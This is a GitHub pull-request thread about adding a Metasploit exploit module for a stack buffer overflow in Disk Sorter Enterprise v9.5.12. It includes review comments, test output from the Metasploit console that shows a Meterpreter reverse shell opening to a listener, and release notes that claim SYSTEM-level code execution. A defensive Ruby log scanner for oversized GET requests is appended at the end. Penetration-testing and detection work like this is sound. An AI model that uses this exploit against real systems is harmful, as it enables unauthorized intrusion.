
Buffer Overflow on Disk Sorter Enterprise #8266

Merged
merged 4 commits into from Apr 24, 2017

Conversation

DanielRTeixeira
Contributor

Buffer Overflow on Disk Sorter Enterprise
@h00die
Contributor

h00die commented Apr 23, 2017

Can you please add docs

'Name' => 'Disk Sorter Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of Disk Sorter Enterprise v9.5.12,caused by

space after ,

@DanielRTeixeira
Contributor Author

Done, let me know if you need anything else.

@h00die
Contributor

h00die commented Apr 24, 2017

docs are .md not .rb.md

you should be able to use your module, then do info -d and view it in a browser to know you did it correctly

@wchen-r7 wchen-r7 self-assigned this Apr 24, 2017
@wchen-r7
Contributor

I will test this PR. Thanks!

@wchen-r7
Contributor

The exploit works for me:

msf exploit(disksorter_bof) > show options

Module options (exploit/windows/http/disksorter_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.146.173  yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.146.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Sorter Enterprise v9.5.12


msf exploit(disksorter_bof) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Sending request...
[*] Sending stage (957487 bytes) to 192.168.146.173
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.173:1051) at 2017-04-24 17:15:39 -0500

Also the doc is easy to follow. Great job!

@wchen-r7 wchen-r7 merged commit a404a1e into rapid7:master Apr 24, 2017
@wchen-r7
Contributor

wchen-r7 commented Apr 24, 2017

Release Notes

The exploit/windows/http/disksorter_bof module has been added to the framework. It exploits a buffer overflow vulnerability in Disk Sorter Enterprise. By sending a specially crafted string in an HTTP GET request, you can gain arbitrary remote code execution under the context of SYSTEM.
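
As an added example from the detection side (not code from this PR or from Metasploit): a small Ruby scanner over constructed Common Log Format access-log lines that flags GET requests whose request target is abnormally long, the kind of input a stack-based overflow in a web interface such as Disk Sorter's receives. The 512-byte threshold, the sample log lines and the field layout are assumptions; the page states no overflow length or vulnerable parameter.

```ruby
# Added example, not part of the Metasploit PR: flag HTTP GET requests with an
# oversized request target in web-server access logs. Log lines are constructed
# and the length threshold is an assumption, not a value from the page.

# Common Log Format: host ident user [time] "method target proto" status bytes
LOG_RE = /\A(?<host>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) (?<proto>HTTP\/\d\.\d)" (?<status>\d{3}) (?<bytes>\S+)/

# Request targets longer than this are reported (assumption: tune per application).
MAX_TARGET_LEN = 512

Finding = Struct.new(:host, :time, :method, :target_len, :status)

# Parse one access-log line into a hash, or nil if it does not match the format.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { host: m[:host], time: m[:time], method: m[:method],
    target: m[:target], status: m[:status].to_i }
end

# True when the entry is a GET whose request target exceeds the limit.
def oversized_get?(entry, limit = MAX_TARGET_LEN)
  entry[:method] == 'GET' && entry[:target].length > limit
end

# Return a Finding for every oversized GET in the given log text;
# unparseable lines are skipped rather than raising.
def scan_log(text, limit = MAX_TARGET_LEN)
  text.each_line.map do |line|
    e = parse_line(line.chomp)
    next nil unless e && oversized_get?(e, limit)
    Finding.new(e[:host], e[:time], e[:method], e[:target].length, e[:status])
  end.compact
end

# Constructed sample: one normal GET, one GET with an 801-byte target, one POST.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [24/Apr/2017:17:15:30 -0500] "GET /index.html HTTP/1.1" 200 1234
  10.0.0.9 - - [24/Apr/2017:17:15:39 -0500] "GET /#{'A' * 800} HTTP/1.1" 500 0
  10.0.0.5 - - [24/Apr/2017:17:16:01 -0500] "POST /login HTTP/1.1" 302 0
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |f|
    puts "#{f.time} #{f.host}: #{f.method} target of #{f.target_len} bytes (status #{f.status})"
  end
end
```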
